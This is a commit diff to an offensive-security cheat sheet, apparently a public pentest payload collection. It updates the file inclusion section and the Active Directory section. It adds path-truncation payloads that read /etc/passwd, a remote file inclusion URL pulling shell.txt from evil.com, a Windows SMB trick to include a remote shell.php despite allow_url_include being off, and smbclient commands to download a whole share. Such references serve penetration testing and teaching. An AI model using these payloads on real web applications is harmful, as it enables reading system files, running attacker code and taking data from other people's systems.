RFI - Windows SMB allow_url_include = "Off"

yield65 · May 12, 2019 · b81df17 · b81df17
1 parent bab04f8
commit b81df17
Show file tree

Hide file tree

Showing 2 changed files with 29 additions and 5 deletions.
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
@@ -9,7 +9,7 @@
 * [Basic LFI](#basic-lfi)
     * [Null byte](#null-byte)
     * [Double encoding](#double-encoding)
-    * [Path truncation](#path-truncation)
+    * [Path and dot truncation](#path-and-dot-truncation)
     * [Filter bypass tricks](#filter-bypass-tricks)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
@@ -48,14 +48,15 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
 
-### Path truncation
+### Path and dot truncation
 
 On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
 
 ```powershell
-http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
-http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE] 
-http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
+http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
+http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
+http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
 ```
 
 ### Filter bypass tricks
@@ -68,6 +69,8 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
 
 ## Basic RFI
 
+Most of the filter bypasses from LFI section can be reused for RFI.
+
 ```powershell
 http://example.com/index.php?page=http://evil.com/shell.txt
 ```
@@ -84,6 +87,15 @@ http://example.com/index.php?page=http://evil.com/shell.txt%00
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 ```
 
+### Bypass allow_url_include
+
+When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
+
+1. Create a share open to everyone
+2. Write a PHP code inside a file : `shell.php`
+3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
+
+
 ## LFI / RFI using wrappers
 
 ### Wrapper php://filter
@@ -293,3 +305,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
 * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
+* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -152,6 +152,17 @@ cd Folder     # move inside a folder
 ls            # list files
 ```
 
+Download a folder recursively
+
+```powershell
+smbclient //10.0.0.1/Share
+smb: \> mask ""
+smb: \> recurse ON
+smb: \> prompt OFF
+smb: \> lcd '/path/to/go/'
+smb: \> mget *
+```
+
 Mount a share
 
 ```powershell